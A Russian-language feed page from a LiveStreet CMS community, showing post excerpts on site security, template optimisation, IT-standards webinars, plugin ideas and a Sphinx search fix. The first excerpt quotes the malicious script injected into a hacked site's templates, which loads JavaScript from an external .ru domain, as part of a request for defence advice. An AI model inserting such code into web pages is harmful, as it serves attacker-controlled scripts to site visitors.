+14.47
Рейтинг
52.59
Сила

Alexey Elizarov

Как защитить сайт от взлома?

Всем привет!

Хочу поделиться некоторыми пережитым опытом и услышать мнения специалистов.

Не так давно на сайте, которым я занимаюсь более 3 лет, появился вредоносный код. Сайт имеет большую аудиторию и по этой причине стал жертвой хакера(ов).

В компилированные файлы шаблона вставлялся код следующего вида
<script>;document.write('<'+'script src=http://fljjsh'+'dqkrqq.ru/'+Math.round(Math.random()*99999999)+'.js></'+'script'+'>');</script>


Читать дальше →

Оптимизация шаблонов

Пролог


Наброски по данной статье лежали ещё с конца зимы и все никак не было времени на её написание, поэтому решил опубликовать её почти «как есть» т.е. с сухими выжимками фактов, без расписанных деталей. Это поможет остальным членам сообщества совершенствовать свои шаблоны.

Читать дальше →

Серия вебинаров «Разработка новых профессиональных стандартов в области информационных технологий»

11-13 сентября 2013 г. приглашаем принять участие в серии вебинаров «Разработка новых профессиональных стандартов в области информационных технологий»

Под эгидой ассоциации АП КИТ ведется разработка новых профессиональных стандартов в области ИТ в рамках федеральной программы, инициированной Указом Президента РФ №597 от 7 мая 2012 г. Процесс разработки носит открытый публичный характер. Мы заинтересованы в максимально широком участии в этом процессе всех заинтересованных сторон. Вебинары позволяют широкому кругу экспертов, в том числе из других городов, принять участие в обсуждениях.

В ходе вебинаров докладчики – руководители / координаторы групп разработки проф. стандартов по ИТ – представят тексты разрабатываемых стандартов профессиональной деятельности и обсудят их с профессиональным экспертным сообществом. Приглашаем специалистов в соответствующих видах профессиональной деятельности, специалистов в области управления персоналом и других заинтересованных лиц.

Регистрация: www4.gotomeeting.com/register/249322815 (единая для всех вебинаров)

График вебинаров (указаны названия проф. стандартов):

11 сентября (среда)
11:00-11:50 «Программист»
12:00-12:50 «Руководитель разработки программного обеспечения»
13:00-13:50 «Администратор баз данных»
14:00-14:50 «Специалист по тестированию в области ИТ»

12 сентября (четверг)
11:00-11:50 «Архитектор программного обеспечения»
12:00-12:50 «Системный аналитик»
13:00-13:50 «Специалист по информационным системам»
14:00-14:50 «Руководитель проектов в области ИТ»

13 сентября (пятница)
11:00-11:50 «Менеджер продуктов в области ИТ»
12:00-12:50 «Менеджер информационных технологий»
13:00-13:50 «Специалист по информационным ресурсам»
14:00-14:50 «Технический писатель (Специалист по технической документации в области ИТ)»

модуль чтобы пользователь мог изменять бэкграунд

есть ли модуль чтобы пользователь мог изменять бэкграунд а еще лучше иметь при этом арсенал готовых фонов как это на ЖЖ. и бордер радиусом скруглять углы для класса с блоками новостей?

Идея плагина: Яндекс и оригинальные тексты

У Яндекса есть такая штука как отправка оригинальных текстов — webmaster.yandex.ru/content/?service=ORIGINALS Это помогает бороться с копирование материалов с вашего сайта (теоритически).



Раньше этим нужно было заниматься вручную, но на днях Яндекс дал возможность автоматизировать этот процесс через API — webmaster.ya.ru/15459

Собственно предлагаю чтобы-кто то написал соответствующий плагин для LiveStreet. Он должен отправлять все добавленные тексты в Яндекс через API. Платно/бесплатно — на ваше усмотрение.

Срач протектор

НА любом посещаемом тематическом ресурсе всегда возникают срачи и холивары. В интернете всегда кто то неправ. И вот сегодня, увидев в своем сообществе под 900 комментариев к записи из которых 95% был яростный холивар между очередными остро и тупоконечниками, понял, что пора что то делать.

Т.к. я противник цензуры в любом ее проявлении, то суть такова:

У любого комментария помимо голосов вверх/вниз появляется еще кнопки «это срач»/«это не срач» жать которую могут зарегленные пользователи. После N голосов вся дальнейшая ветка принудительно свертывается от текущего комментария и ниже. Хочешь покидать на вентилятор? Не вопрос. Кликай по плюсику, разворачивай ветвь и набрасывай. Остальным же эта ветвь мешать не не будет.

Ну и очень желательно, чтобы после того как ветвь получила статус «срач» топикстартеру не шли ответы в эту ветку на почту. Только участникам специальной олимпиады.

Кто может реализовать сию приблуду в виде плагина и сколько он за это хочет.

Оптимизация индексирования Shpinx для LiveStreet, исправляем древнюю проблему с закрытыми блогами

Суть проблемы — LS ищет и находит сфинксом заметки и комментарии из всех блогов, независимо от того имеете вы к ним доступ или нет.

Чинится это просто:
  1. вносим в поисковый индекс id закрытого блога к которому относится топик или комментарий, либо 0 если этот блог не закрытый.
  2. передаём в поиск id текущего пользователя
  3. находим список закрытых блогов в которые имеет доступ текущий пользователь.
  4. используем этот список расширенный нулём (что добавит все не закрытые блоги в результаты поиска для любого пользователя) со стандартной возможностью фильтрации Сфинкса


Читать дальше →